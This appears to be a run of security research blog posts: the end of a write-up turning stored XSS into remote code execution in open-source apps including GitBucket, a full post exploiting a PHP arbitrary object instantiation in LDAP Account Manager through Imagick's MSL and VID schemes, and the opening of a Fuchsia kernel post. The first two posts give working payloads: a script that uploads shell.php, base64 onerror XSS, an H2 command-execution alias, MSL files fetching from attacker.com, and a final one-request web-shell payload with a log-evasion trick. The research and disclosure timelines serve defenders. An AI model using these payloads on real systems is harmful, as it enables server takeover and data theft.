    body += cur + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
    body += csrf + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
    body += "Content-Type: " + contentType + "\r\n\r\n";
    body += fileData + "\r\n\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
    body += "1" + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
    body += fileName + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
    body += "Upload File" + '\r\n';
    body += "--" + boundary + "--";
    xhr.send(body);
}

let req = new XMLHttpRequest();
req.onreadystatechange = function() {
    if (req.readyState == 4 && req.status == 200) {
        let response = req.response;
        uploadShellWithCSRFToken(response.querySelector('input[name=SQ]').value);
    }
}
req.open("GET", action, true);
req.responseType = "document";
req.send();

Now an attacker can write a private message to himself and attach the mentioned exploit as a file. After the message has been sent, the attacker needs to get the path to the JavaScript exploit hosted on the server:

index.php?t=getfile&id=7&private=1

The next step is to prepare the JavaScript payload that will be executed via the stored XSS attack. The essence of the payload is to fetch the previously placed exploit and run it:

$.get('index.php?t=getfile&id=7&&private=1',function(d){eval(d)})

It remains to put everything together to form the full name of the attached file in private messages. We will encode the assembled JavaScript payload in Base64:

<img src=1 onerror=eval(atob('JC5nZXQoJ2luZGV4LnBocD90PWdldGZpbGUmaWQ9NyYmcHJpdmF0ZT0xJyxmdW5jdGlvbihkKXtldmFsKGQpfSk='))>.png

After the administrator reads the private message sent by the attacker with the attached file, a file named shell.php will be created on the server on behalf of the administrator, which will allow the attacker to execute arbitrary commands on the server:

## GitBucket v4.37.1

CVE: Pending

GitBucket is a Git platform powered by Scala with easy installation, high extensibility, and GitHub API compatibility.

In GitBucket, I found an unescaped display of a user-controlled issue name on the home page and the attacker’s profile page (/hacker?tab=activity), which leads to a stored XSS:

With a stored XSS attack in hand, an attacker can try to exploit it in order to execute code on the server. The admin panel has a tool for performing SQL queries: the Database viewer.

GitBucket uses the H2 Database Engine by default. For this database, there is a publicly available exploit to achieve Remote Code Execution.

So, all an attacker needs to do is create a PoC code based on this exploit, upload it to the repository, and use it during an attack:

var url = "/admin/dbviewer/_query";
$.post(url, {
    query: 'CREATE ALIAS EXECVE AS $$String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;'
}).done(function(data) {
    $.post(url, {query: "CALL EXECVE('touch HACKED')"});
});


Now it remains to create a new issue, or rename an old one, and perform a stored XSS attack that loads the exploit uploaded earlier:

Issue 1"><script src="/hacker/Repo1/raw/f85ebe5d6b979ca69411fa84749edead3eec8de0/exploit.js"></script>

When the administrator visits the attacker’s profile page or the main page, the exploit will be executed on his behalf and a HACKED file will be created on the server:

## Conclusions

We have demonstrated that a low-skilled attacker can easily achieve a remote code execution via any XSS attack in multiple open-source applications.

Information about all found vulnerabilities was reported to the maintainers. Fixes are available in the official repositories:

# Exploiting Arbitrary Object Instantiations in PHP without Custom Classes

14 July 2022 at 13:18

During an internal penetration test, I discovered an unauthenticated Arbitrary Object Instantiation vulnerability in LAM (LDAP Account Manager), a PHP application.

PHP’s Arbitrary Object Instantiation is a flaw in which an attacker can create arbitrary objects. This flaw can come in all shapes and sizes. In my case, the vulnerable code could have been shortened to one simple construction:

new $_GET['a']($_GET['b']);

That’s it. There was nothing else there, and I had zero custom classes to give me a code execution or a file upload. In this article, I explain how I was able to get a Remote Code Execution via this construction.

## Discovering LDAP Account Manager

At the beginning of our internal penetration test, I scanned the network for the 636/tcp port (ssl/ldap), and I discovered an LDAP service:

$ nmap 10.0.0.1 -p80,443,389,636 -sC -sV -Pn -n

Nmap scan report for 10.0.0.1
Host is up (0.005s latency).

PORT    STATE  SERVICE  VERSION
389/tcp closed ldap
443/tcp open   ssl/http Apache/2.4.25 (Debian)
636/tcp open   ssl/ldap OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=*.company.com
| Subject Alternative Name: DNS:*.company.com, DNS:company.com
| Not valid before: 2022-01-01T00:00:00
|_Not valid after:  2024-01-01T23:59:59
|_ssl-date: TLS randomness does not represent time

I tried to access this LDAP service via an anonymous session, but it failed:

$ ldapsearch -H ldaps://10.0.0.1:636/ -x -s base -b '' "(objectClass=*)" "*" +
ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)

However, after I put the line “10.0.0.1 company.com” into my /etc/hosts file, I was able to connect to this LDAP service and extract all publicly available data. This meant the server had a TLS SNI check, and I was able to bypass it using a hostname from the server’s certificate.

The domain “company.com” wasn’t the right domain name of the server, but it worked.
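An alternative to editing /etc/hosts is to present the desired SNI name directly when connecting by IP. A minimal sketch of that idea in Python follows (the IP, port, and hostname are placeholders from the engagement; verification is disabled because a wildcard certificate cannot be validated against a raw IP):

```python
# Sketch: open a TLS session to a raw IP while sending an arbitrary SNI name.
import socket
import ssl

def sni_context() -> ssl.SSLContext:
    """TLS context for connecting by IP while presenting a chosen SNI name."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # we connect by raw IP on purpose
    ctx.verify_mode = ssl.CERT_NONE  # wildcard cert can't be verified against an IP
    return ctx

def connect_with_sni(ip: str, port: int, sni: str) -> str:
    """Handshake with ip:port, sending `sni` in the ClientHello; return TLS version."""
    with socket.create_connection((ip, port), timeout=5) as sock:
        with sni_context().wrap_socket(sock, server_hostname=sni) as tls:
            return tls.version() or ""

# Usage against the engagement's server would look like:
# connect_with_sni("10.0.0.1", 636, "company.com")
```

The `server_hostname` argument is what ends up in the SNI extension, which is exactly the field the server was checking.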

$ ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
configContext: cn=config
namingContexts: dc=linux,dc=company,dc=com
…

$ ldapsearch -H ldaps://company.com:636/ -x -s sub -b 'dc=linux,dc=company,dc=com' "(objectClass=*)" "*" +
…
objectClass: person
objectClass: ldapPublicKey
sshPublicKey: ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAuZwGKsvsKlXhscOsIMUrwtFvoEgl
…

After extracting information, I discovered that almost every user record in the LDAP had the sshPublicKey property, containing the users’ SSH public keys. So, gaining access to this server would mean gaining access to the entire Linux infrastructure of this customer.
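Enumerating those keys from raw ldapsearch output is straightforward. Below is a sketch of a small LDIF scraper; the sample record is fabricated, and base64-encoded `sshPublicKey::` attributes are deliberately not handled:

```python
# Sketch: pull sshPublicKey attribute values out of ldapsearch (LDIF) output,
# joining the continuation lines that LDIF wraps with a leading space.
def ssh_keys(ldif: str):
    keys, current = [], None
    for line in ldif.splitlines():
        if line.startswith("sshPublicKey: "):
            if current is not None:
                keys.append(current)
            current = line[len("sshPublicKey: "):]
        elif current is not None and line.startswith(" "):
            current += line[1:]          # LDIF continuation line
        elif current is not None:
            keys.append(current)
            current = None
    if current is not None:
        keys.append(current)
    return keys

# Fabricated sample record for illustration.
sample = (
    "dn: uid=jdoe,dc=linux,dc=company,dc=com\n"
    "objectClass: ldapPublicKey\n"
    "sshPublicKey: ssh-rsa AAAAB3Nza\n"
    " C1yc2EAAAABJQ== jdoe\n"
)
```

A pass like this over the full dump quickly shows how many accounts expose keys, and therefore how valuable the LAM host is as a target.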

Since I wasn’t aware of any vulnerabilities in OpenLDAP, I decided to brute force the Apache server on port 443/tcp for any files and directories. There was only one directory:

[12:00:00] 301 -   344B   ->  /lam => https://10.0.0.1/lam/

And this is how I found the LAM system.

## LDAP Account Manager

LDAP Account Manager (LAM) is a PHP web application for managing LDAP directories via a user-friendly web frontend. It’s one of the alternatives to FreeIPA.

I encountered the LAM 5.5 system:

The default configuration of LAM allows any LDAP user to log in, but it might easily be changed to accept users from a specified administrative group only. Additional two-factor authentication, such as Yubico or TOTP, can be enforced as well.

The source code of LAM could be downloaded from its official GitHub page. LAM 5.5 was released in September 2016. The codebase of LAM 5.5 is quite poor compared to its newer versions, and this gave me some challenges.

In contrast to many web applications, LAM is not intended to be installed manually to a web server. LAM is included in Debian repositories and is usually installed from there or from deb/rpm packages. In such a setup, there should be no misconfigurations and no other software on the server.

## Analyzing LDAP Account Manager

LAM 5.5 has a few scripts available for unauthenticated users.

I found an LDAP Injection, which was useless since the data were being injected into an anonymous LDAP session, and an Arbitrary Object Instantiation.

/lam/templates/help.php:

if (isset($_GET['module']) && !($_GET['module'] == 'main') && !($_GET['module'] == '')) {
    include_once(__DIR__ . "/../lib/modules.inc");
    if (isset($_GET['scope'])) {
        $helpEntry = getHelp($_GET['module'], $_GET['HelpNumber'], $_GET['scope']);
    }
    else {
        $helpEntry = getHelp($_GET['module'], $_GET['HelpNumber']);
    }
…

/lib/modules.inc:

function getHelp($module, $helpID, $scope='') {
    …
    $moduleObject = moduleCache::getModule($module, $scope);
    …

/lam/lib/account.inc:

public static function getModule($name, $scope) {
    …
    self::$cache[$name . ':' . $scope] = new $name($scope);
    …

Here, the value of $_GET['module'] gets to $name, and the value of $_GET['scope'] gets to $scope. After this, the construction new $name($scope) is executed.

So, whether I would gain access to the entire Linux infrastructure of this customer came down to whether I could exploit this construction into a Remote Code Execution.

## Exploiting “new $a($b)” via Custom Classes or Autoloading

In the construction new $a($b), the variable $a stands for the class name that the object will be created for, and the variable $b stands for the first argument that will be passed to the object’s constructor.

If $a and $b come from GET/POST, they can be strings or string arrays. If they come from JSON or elsewhere, they might have other types, such as object or boolean.

Let’s consider the following example:

class App {
    function __construct($cmd) {
        system($cmd);
    }
}

# Additionally, in PHP < 8.0 a constructor might be defined using the name of the class
class App2 {
    function App2($cmd) {
        system($cmd);
    }
}

# Vulnerable code
$a = $_GET['a'];
$b = $_GET['b'];

new $a($b);

In this code, you can set $a to App or App2 and $b to uname -a. After this, the command uname -a will be executed.
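The same bug class exists in any language with dynamic instantiation. Below is a loose Python analogue of `new $a($b)` (hypothetical code, not from LAM), together with the allow-list shape that prevents the vulnerability:

```python
# "new $a($b)" in Python terms: a user-chosen class name decides which
# constructor runs. Restricting the choice to an explicit allow-list is the fix.
class Help:
    def __init__(self, scope):
        self.scope = scope

ALLOWED = {"Help": Help}  # only classes meant to be user-selectable

def make(name, arg):
    """Instantiate `name` with one constructor argument, allow-list enforced."""
    cls = ALLOWED.get(name)
    if cls is None:
        raise ValueError("class not allowed: " + name)
    return cls(arg)
```

Without the allow-list check, the lookup would happily hand back any reachable class, which is exactly the situation the rest of this article exploits in PHP.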

When there are no such exploitable classes in your application, or you have the class needed in a separate file that isn’t included by the vulnerable code, you may take a look at autoloading functions.

Autoloading functions are set by registering callbacks via spl_autoload_register or by defining __autoload. They are called when an instance of an unknown class is about to be created.


spl_autoload_register(function ($class_name) {
    include './../classes/' . $class_name . '.php';
});

# An example of an autoloading function, works only in PHP < 8.0
function __autoload($class_name) {
    include $class_name . '.php';
}

# Calling spl_autoload_register with no arguments enables the default
# autoloading function, which includes lowercase($classname) + .php/.inc
# from include_path
spl_autoload_register();

Depending on the PHP version and the code in the autoloading functions, some ways to get a Remote Code Execution via autoloading might exist. In LAM 5.5, I wasn't able to find any useful custom class, and I didn't have autoloading either.

## Exploiting “new $a($b)” via Built-In Classes

When you have neither custom classes nor autoloading, you can rely on built-in PHP classes only. There are from 100 to 200 built-in PHP classes; the number depends on the PHP version and the extensions installed. All of them can be listed via the get_declared_classes function, together with the custom classes:

var_dump(get_declared_classes());

Classes with useful constructors can be found via the Reflection API. If you control multiple constructor parameters and can call arbitrary methods afterwards, there are many ways to get a Remote Code Execution. But if you can pass only one parameter and have no calls to the created object, there is almost nothing. I know of only three ways to get something from new $a($b).

###### Exploiting SSRF + Phar deserialization

The SplFileObject class implements a constructor that allows connection to any local or remote URL:

new SplFileObject('http://attacker.com/');

This allows SSRF. Additionally, SSRFs in PHP < 8.0 could be turned into deserializations via techniques with the Phar protocol. I didn't need SSRF because I had access to the local network, and I wasn't able to find any POP chain in LAM 5.5, so I didn't even consider exploiting deserialization via Phar.

###### Exploiting PDOs

The PDO class has another interesting constructor:

new PDO("sqlite:/tmp/test.txt")

The PDO constructor accepts DSN strings, allowing us to connect to any local or remote database using installed database extensions. For example, the SQLite extension can create empty files. When I tested this on my target server, I discovered that it didn't have any PDO extensions: neither SQLite, MySQL, ODBC, nor any other.

###### SoapClient/SimpleXMLElement XXE

In PHP ≤ 5.3.22 and ≤ 5.4.12, the constructor of SoapClient was vulnerable to XXE. The constructor of SimpleXMLElement was vulnerable to XXE as well, but it required libxml2 < 2.9.

## Discovering New Ways to Exploit “new $a($b)”

To discover new ways to exploit new $a($b), I decided to expand the attack surface. I started by figuring out which PHP versions LAM 5.5 supports, as well as which PHP extensions it uses.

Since LAM is distributed via deb/rpm packages, it contains a configuration file with all its requirements and dependencies:

Source: ldap-account-manager
Maintainer: Roland Gruber <[email protected]>
Section: web
Priority: extra
Standards-Version: 3.9.8
Build-Depends: debhelper (>= 7), po-debconf, yui-compressor
Homepage: https://www.ldap-account-manager.org/

Package: ldap-account-manager
Architecture: all
Depends: php5 (>= 5.4.26) | php (>= 21), php5-ldap | php-ldap, php5-gd | php-gd, php5-json | php-json , php5-imagick | php-imagick, apache2 | httpd, debconf (>= 0.2.26) | debconf-2.0,${misc:Depends}
Recommends: php-apc
Suggests: ldap-server, php5-mcrypt, ldap-account-manager-lamdaemon, perl
...

Contents of the configuration file for deb packages (view on GitHub)

LAM 5.5 requires PHP ≥ 5.4.26 and the LDAP, GD, JSON, and Imagick extensions.

Imagick is infamous for remote code execution vulnerabilities such as ImageTragick. That's where I decided to continue my research.

## The Imagick Extension

The Imagick extension implements multiple classes, including the class Imagick. Its constructor has only one parameter, which can be a string or a string array:

I tested whether Imagick::__construct accepts remote schemes and can connect to my host via HTTP:

I discovered that the Imagick class exists on the target server, and executing new Imagick(...) is enough to coerce the server to connect to my host. However, it wasn't clear whether creating an Imagick instance is enough to trigger any vulnerabilities in ImageMagick.

I tried to send publicly available POCs to the server, but they all failed. After that, I decided to make my life easier and asked for advice in one of the application security communities.

Luckily for me, Emil Lerner came to help. He said that if I could pass values such as “epsi:/local/path” or “msl:/local/path” to ImageMagick, it would use their scheme part, e.g., epsi or msl, to determine the file format.

## Exploring the MSL Format

The most interesting ImageMagick format is MSL.

MSL stands for Magick Scripting Language. It’s a built-in ImageMagick language that facilitates the reading of images, performance of image processing tasks, and writing of results back to the filesystem.

I tested whether new Imagick(...) allows msl: scheme:

The MSL scheme worked on the latest versions of PHP, Imagick, and ImageMagick!

Unfortunately, URLs like msl:http://attacker.com/ aren’t supported, and I needed to upload files to the server to make msl: work.

In LAM, there are no scripts that allow unauthenticated uploads, and I didn’t think that a technique with PHP_SESSION_UPLOAD_PROGRESS would help because I needed a well-formed XML file for MSL.

## Imagick’s Path Parsing

Imagick supports not only its own URL schemes but also PHP schemes (such as “php://”, “zlib://”, etc). I decided to find out how it works.

Here is what I discovered.

###### A null-byte still works

An Imagick argument is truncated by a null-byte, even when it contains a PHP scheme:

# No errors
$a = new Imagick("/tmp/positive.png\x00.jpg");

# No errors
$a = new Imagick("http://attacker.com/test\x00test");
###### Square brackets can be used to detect ImageMagick

ImageMagick is capable of reading options, e.g., an image's size or frame numbers, from square brackets at the end of the file path:

# No errors
$a = new Imagick("/tmp/positive.png[10x10]");

# No errors
$a = new Imagick("/tmp/positive.png[10x10]\x00.jpg");

This might be used to determine whether your input reaches the ImageMagick library.

###### “https://” goes to PHP, but “https:/” goes to curl

ImageMagick supports more than 100 different schemes.

Half of ImageMagick’s schemes are mapped to external programs. This mapping can be viewed using the convert -list delegate command:

I discovered that both PHP and ImageMagick support HTTPS schemes.

Furthermore, passing the “https:/” string to new Imagick(...) bypasses PHP’s HTTPS client and invokes a curl process:

This also overcomes the TLS certificate check, because the -k flag is used. Curl flushes the server's output to a /tmp/*.dat file, which can be found by brute forcing /proc/[pid]/fd/[fd] filenames while the process is active.

I wasn’t able to receive a connection using the “https:/” scheme from the target server, probably because there was no curl.

###### PHP’s arrays can be used to enumerate files

When I discovered the curl technique with flushing the request data to /tmp/*.dat, and brute forcing /proc/[pid]/fd/[fd], I tested whether new Imagick('http://...') flushes data as well. It does!

I tested whether I could temporarily make MSL content appear in /proc/[pid]/fd/[fd] of one of the Apache worker processes and then access it from another one.

Since new Imagick(...) accepts string arrays and stops processing entries after the first error, I was able to enumerate PIDs on the server and discover all PIDs of the Apache workers whose file descriptors I can read:

I discovered that due to some hardening in Debian, I can access only the Apache worker process I execute code in and no others. However, this technique worked locally on my Arch Linux.
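The candidate list for such an enumeration is easy to generate. The sketch below only builds the text:/proc/[pid]/fd/[fd] strings that would be passed to new Imagick(...) as an array; the PID range, fd number, and batch size are illustrative, not the values used in the actual attack:

```python
# Build candidate paths for enumerating readable file descriptors
# of other processes via ImageMagick's array argument.
# PID range, fd number, and batch size below are illustrative.
def fd_candidates(pids, fd=30):
    """Return text:/proc/<pid>/fd/<fd> strings, one per candidate PID."""
    return [f"text:/proc/{pid}/fd/{fd}" for pid in pids]

def batches(items, size=100):
    """Split candidates into per-request batches, since ImageMagick
    stops at the first entry that fails to open."""
    for i in range(0, len(items), size):
        yield items[i:i + size]

candidates = fd_candidates(range(1, 1000))
print(candidates[0])                   # text:/proc/1/fd/30
print(len(list(batches(candidates))))  # 10 batches of up to 100 paths
```

Each batch would become one array argument; which batch errors out first narrows down the PIDs whose descriptors are readable.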

## RCE #1: PHP Crash + Brute Force

After testing multiple ways to include a file from a file descriptor, I discovered that text:fd:30 and similar constructions cause a worker process to crash on the remote web server:

This is what made it initially possible to upload a web shell!

The idea was to create multiple PHP temporary files with our content using multipart/form-data requests. According to the default max_file_uploads value, any client can send up to 20 files in a multipart request, which will be saved to /tmp/phpXXXXXX paths, where X ∈ [A-Za-z0-9]. These files will never be deleted if we cause the worker that creates them to crash.

If we send 20,000 such multipart requests containing 20 files each, it will result in the creation of 400,000 temporary files.

20,000 × 20 = 400,000
(26 + 26 + 10)⁶ / 400,000 ≈ 142,000
P(A) = 1 − (1 − 400,000 / (26 + 26 + 10)⁶)^142,000 ≈ 0.6321

So, with a probability of about 63.21%, after 142,000 tries we will guess at least one temporary file name and include our file with the MSL content.
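The arithmetic above is easy to sanity-check in a few lines of Python; the script only reproduces the estimate and touches no server:

```python
# Reproduce the success-probability estimate for guessing one of
# 400,000 /tmp/phpXXXXXX names, where X is in [A-Za-z0-9].
name_space = (26 + 26 + 10) ** 6   # 62^6 possible 6-character suffixes
created = 20_000 * 20              # temporary files left behind by the crashes
tries = name_space // created      # number of brute-force probes: 142,000

# Probability that at least one probe hits an existing file
p_hit = 1 - (1 - created / name_space) ** tries
print(tries, round(p_hit, 4))      # close to 1 - 1/e ≈ 0.6321
```

The ≈ 0.63 figure is the familiar 1 − 1/e limit: the number of probes is chosen to equal the name space divided by the number of created files.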

Sending more than 20,000 initial requests wouldn’t speed up the process. Any request that causes a crash is quite slow and takes more than a second. What’s more, the creation of more than 400,000 files may create unexpected overhead on the filesystem.
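The first stage, 20 uploads per request, can be sketched with a stdlib-only helper that builds one such multipart/form-data body. The boundary, field names, and the MSL payload's URL and path here are illustrative placeholders, not the exact values used in the attack:

```python
import io

BOUNDARY = "positive"  # illustrative boundary

# A minimal well-formed MSL document; the URL and write path are placeholders
MSL = b"""<?xml version="1.0" encoding="UTF-8"?>
<image>
 <read filename="http://attacker.example/positive.png" />
 <write filename="/var/lib/ldap-account-manager/tmp/positive.php" />
</image>"""

def build_multipart_body(parts: int = 20) -> bytes:
    """Build a multipart/form-data body with `parts` file fields.

    PHP saves every file field to a /tmp/phpXXXXXX temporary file;
    the default max_file_uploads caps this at 20 files per request.
    """
    out = io.BytesIO()
    for i in range(parts):
        out.write(f"--{BOUNDARY}\r\n".encode())
        out.write(
            (
                f'Content-Disposition: form-data; name="f{i}"; filename="f{i}.msl"\r\n'
                "Content-Type: text/plain\r\n\r\n"
            ).encode()
        )
        out.write(MSL + b"\r\n")
    out.write(f"--{BOUNDARY}--\r\n".encode())
    return out.getvalue()

body = build_multipart_body()
print(body.count(b"Content-Disposition"))  # one per saved temporary file
```

Sending 20,000 such bodies, each followed by a worker crash, is what leaves the roughly 400,000 orphaned /tmp/phpXXXXXX files behind.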

Let’s construct this multipart request!

First, we need to create an image containing a web shell, since MSL works with images only:

convert xc:red -set 'Copyright' '<?php @eval(@$_REQUEST["a"]); ?>' positive.png

Second, let's create an MSL file that will copy this image from our HTTP server to a writable web directory. It wasn't hard to find such a directory in the configuration files of LAM.

<?xml version="1.0" encoding="UTF-8"?>
<image>
 <read filename="http://attacker.com/positive.png" />
 <write filename="/var/lib/ldap-account-manager/tmp/positive.php" />
</image>

And third, let's put it all together in Burp Suite Intruder:

To make the attack smooth, I set the PHPSESSID cookie to prevent the creation of multiple session files (not to be confused with temporary upload files) and specified the direct IP of the server, since it turned out that a balancer on 10.0.0.1 was directing requests to different data centers. Additionally, I enabled the denial-of-service mode in Burp Intruder to prevent descriptor exhaustion in Burp Suite, which might happen because of incorrect TCP handling on the server side.

After all 20,000 multipart requests were sent, I brute forced the /tmp/phpXXXXXX files via Burp Intruder:

There was nothing to see there; all the server responses stayed the same. However, after 120,000 tries, our web shell was uploaded! After this, we got administrative access to OpenLDAP and took control over all Linux servers of this customer with the maximum privileges!

## RCE #2: VID Scheme

I tried to reproduce the technique with text:fd:30 locally and discovered that this construction no longer crashes ImageMagick. I went deep into the ImageMagick sources to find a new crash, and I found something much better. Here is my discovery.

Let's look into the function ReadVIDImage(...), which is used for parsing VID schemes:

The VID scheme accepts masks and constructs file paths from them. So, using the vid: scheme, we can include our temporary file with the MSL content without knowing its name:

After this, I discovered the quite interesting caption: and info: schemes.
The combination of the two makes it possible to eliminate the out-of-band connection and create a web shell in one fell swoop:

This is how we were able to exploit this Arbitrary Object Instantiation in one request, and without using any of the application's classes!

## The Final Payload

Here is the final payload for exploiting Arbitrary Object Instantiations:

Class Name: Imagick
Argument Value: vid:msl:/tmp/php*

-- Request Data --
Content-Type: multipart/form-data; boundary=ABC
Content-Length: ...
Connection: close

--ABC
Content-Disposition: form-data; name="swarm"; filename="swarm.msl"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<image>
 <read filename="caption:&lt;?php @eval(@$_REQUEST['a']); ?&gt;" />
<!-- Relative paths such as info:./../../uploads/swarm.php can be used as well -->
<write filename="info:/var/www/swarm.php" />
</image>
--ABC--

It should work on every system on which the Imagick extension is installed, and it can be used in deserializations if you find a suitable gadget.

When the PHP runtime is libapache2-mod-php, you can prevent logging of this request by uploading a web shell and crashing the process at the same time:

Argument Value: ["vid:msl:/tmp/php*", "text:fd:30"]

Since the construction text:fd:30 doesn’t work on the latest ImageMagick, here is another one:

Crash Construction: str_repeat("vid:", 400)

This one works on every ImageMagick below 7.1.0-40 (released on July 4, 2022).

In installations like Nginx + PHP-FPM, the request wouldn’t disappear from Nginx’s logs, but it should not be written to PHP-FPM logs.

## Afterword

Our team would like to say thank you to Roland Gruber, the developer of LAM, for the quick response and the patch, and to all researchers who previously looked at ImageMagick and shared their findings.

Timeline:

• 16 June, 2022 — Reported to Roland Gruber
• 16 June, 2022 — Initial reply from Roland Gruber
• 27 June, 2022 — LAM 8.0 is released
• 27 June, 2022 — CVE-2022-31084, CVE-2022-31085, CVE-2022-31086, CVE-2022-31087, CVE-2022-31088 are issued
• 29 June, 2022 — LAM 8.0.1 is released, additional hardening has been done
• 05 July, 2022 — Debian packages are updated
• 14 July, 2022 — Public disclosure

Additionally, for exploiting Arbitrary Object Instantiations with an injection into a constructor with two parameters, there is a public vector (in Russian). If you control three, four, or five parameters, you can use the SimpleXMLElement class and enable external entities.

Feel free to comment on this article on our Twitter. Follow @ptswarm or @_mohemiv so you don't miss our future research and other publications.

# A Kernel Hacker Meets Fuchsia OS

24 May 2022 at 09:52

Fuchsia is a general-purpose open-source operating system created by Google. It is based on the Zircon microkernel written in C++ and is currently under active development. The developers say that Fuchsia is designed with a focus on security, updatability, and performance. As a Linux kernel hacker, I decided to take a look at Fuchsia OS and assess it from the attacker’s point of view. This article describes my experiments.

## Summary

• In the beginning of the article, I will give an overview of the Fuchsia operating system and its security architecture.
• Then I’ll show how to build Fuchsia from the source code and create a simple application to run on it.
• A closer look at the Zircon microkernel: I’ll describe the workflow of the Zircon kernel development and show how to debug it using GDB and QEMU.
• My exploit development experiments for the Zircon microkernel:
  • Fuzzing attempts,
  • Exploiting a memory corruption for a C++ object,
  • Kernel control-flow hijacking,
  • Planting a rootkit into Fuchsia OS.
• Finally, the exploit demo.

I followed the responsible disclosure process for the Fuchsia security issues discovered during this research.

## What is Fuchsia OS

Fuchsia is a general-purpose open-source operating system. Google started the development of this OS around 2016. In December 2020 this project was opened for contributors from the public. In May 2021 Google officially released Fuchsia running on Nest Hub devices. The OS supports arm64 and x86-64. Fuchsia is under active development and looks alive, so I decided to do some security experiments on it.

Let’s look at the main concepts behind the Fuchsia design. This OS is developed for the ecosystem of connected devices: IoT, smartphones, PCs. That’s why Fuchsia developers pay special attention to security and updatability. As a result, Fuchsia OS has an unusual security architecture.

First of all, Fuchsia has no concept of a user. Instead, it is capability-based. The kernel resources are exposed to applications as objects that require the corresponding capabilities. The main idea is that an application can’t interact with an object if it doesn’t have an explicitly granted capability. Moreover, software running on Fuchsia should receive the least capabilities to perform its job. So, I think, the concept of local privilege escalation (LPE) in Fuchsia would be different from that in GNU/Linux systems, where an attacker executes code as an unprivileged user and exploits some vulnerability to gain root privileges.

The second interesting aspect: Fuchsia is based on a microkernel. That has great influence on the security properties of this OS. Compared to the Linux kernel, plenty of functionality is moved out from the Zircon microkernel to userspace. That makes the kernel attack surface smaller. See the scheme from the Fuchsia documentation below, which shows that Zircon implements only a few services unlike monolithic OS kernels. However, Zircon does not strive for minimality: it has over 170 syscalls, vastly more than a typical microkernel does.

The next security solution I have to mention is sandboxing. Applications and system services live in Fuchsia as separate software units called components. These components run in isolated sandboxes. All inter-process communication (IPC) between them must be explicitly declared. Fuchsia even has no global file system. Instead, each component is given its own local namespace to operate in. This design solution increases userspace isolation and the security of Fuchsia applications. I think it also makes the Zircon kernel very attractive for an attacker, since Zircon provides system calls for all Fuchsia components.

Finally, Fuchsia has an unusual scheme of software delivery and updating. Fuchsia components are identified by URLs and can be resolved, downloaded, and executed on demand. The main goal of this design solution is to make software packages in Fuchsia always up to date, like web pages.

These security features made Fuchsia OS a new and interesting research target for me.

## First try

The Fuchsia documentation provides a good tutorial describing how to get started with this OS. The tutorial gives a link to a script that can check your GNU/Linux system against the requirements for building Fuchsia from source:

$ ./ffx-linux-x64 platform preflight

It says that non-Debian distributions are not supported. However, I haven't experienced any problems specific to Fedora 34. The tutorial also provides instructions for downloading the Fuchsia source code and setting up the environment variables. These commands build Fuchsia's workstation product with developer tools for x86_64:

$ fx clean
$ fx set workstation.x64 --with-base //bundles:tools
$ fx build

After building Fuchsia OS, you can start it in FEMU (Fuchsia emulator). FEMU is based on the Android Emulator (AEMU), which is a fork of QEMU.

$ fx vdl start -N

## Creating a new component

Let's create a "hello world" application for Fuchsia. As I mentioned earlier, Fuchsia applications and programs are called components. This command creates a template for a new component:

$ fx create component --path src/a13x-pwns-fuchsia --lang cpp

I want this component to print “hello” to the Fuchsia log:

#include <iostream>

int main(int argc, const char** argv)
{
std::cout << "Hello from a13x, Fuchsia!\n";
return 0;
}

The component manifest src/a13x-pwns-fuchsia/meta/a13x_pwns_fuchsia.cml should have this part to allow stdout logging:

program: {
// Use the built-in ELF runner.
runner: "elf",

// The binary to run for this component.
binary: "bin/a13x-pwns-fuchsia",

// Enable stdout logging
forward_stderr_to: "log",
forward_stdout_to: "log",
},

These commands build Fuchsia with a new component:

$ fx set workstation.x64 --with-base //bundles:tools --with-base //src/a13x-pwns-fuchsia
$ fx build

When Fuchsia with the new component is built, we can test it:

1. Start FEMU with Fuchsia using the command fx vdl start -N in the first terminal on the host system
2. Start Fuchsia package publishing server using the command fx serve in the second terminal on the host system
3. Show Fuchsia logs using the command fx log in the third terminal on the host system
4. Start the new component using the ffx tool in the fourth terminal on the host system:
   $ ffx component run fuchsia-pkg://fuchsia.com/a13x-pwns-fuchsia#meta/a13x_pwns_fuchsia.cm --recreate

In this screenshot (click to zoom in), we see that Fuchsia resolved the component by URL, downloaded it, and started it. Then the component printed Hello from a13x, Fuchsia! to the Fuchsia log in the third terminal.

## Zircon kernel development workflow

Now let's focus on the Zircon kernel development workflow. The Zircon source code in C++ is a part of the Fuchsia source code. Residing in the zircon/kernel subdirectory, it is compiled when Fuchsia OS is built.

Zircon development and debugging requires running it in QEMU using the fx qemu -N command. However, when I tried it I got an error:

$ fx qemu -N
Building multiboot.bin, fuchsia.zbi, obj/build/images/fuchsia/fuchsia/fvm.blk
ninja: Entering directory `/home/a13x/develop/fuchsia/src/fuchsia/out/default'
ninja: no work to do.
ERROR: Could not extend FVM, unable to stat FVM image out/default/obj/build/images/fuchsia/fuchsia/fvm.blk

I discovered that this fault happens on machines that have a non-English console locale. This bug has been known for a long time. I have no idea why the fix hasn’t been merged yet. With this patch Fuchsia OS successfully starts on a QEMU/KVM virtual machine:

diff --git a/tools/devshell/lib/fvm.sh b/tools/devshell/lib/fvm.sh
index 705341e482c..5d1c7658d34 100644
--- a/tools/devshell/lib/fvm.sh
+++ b/tools/devshell/lib/fvm.sh
@@ -35,3 +35,3 @@ function fx-fvm-extend-image {
fi
-  stat_output=$(stat "${stat_flags[@]}" "${fvmimg}")
+  stat_output=$(LC_ALL=C stat "${stat_flags[@]}" "${fvmimg}")
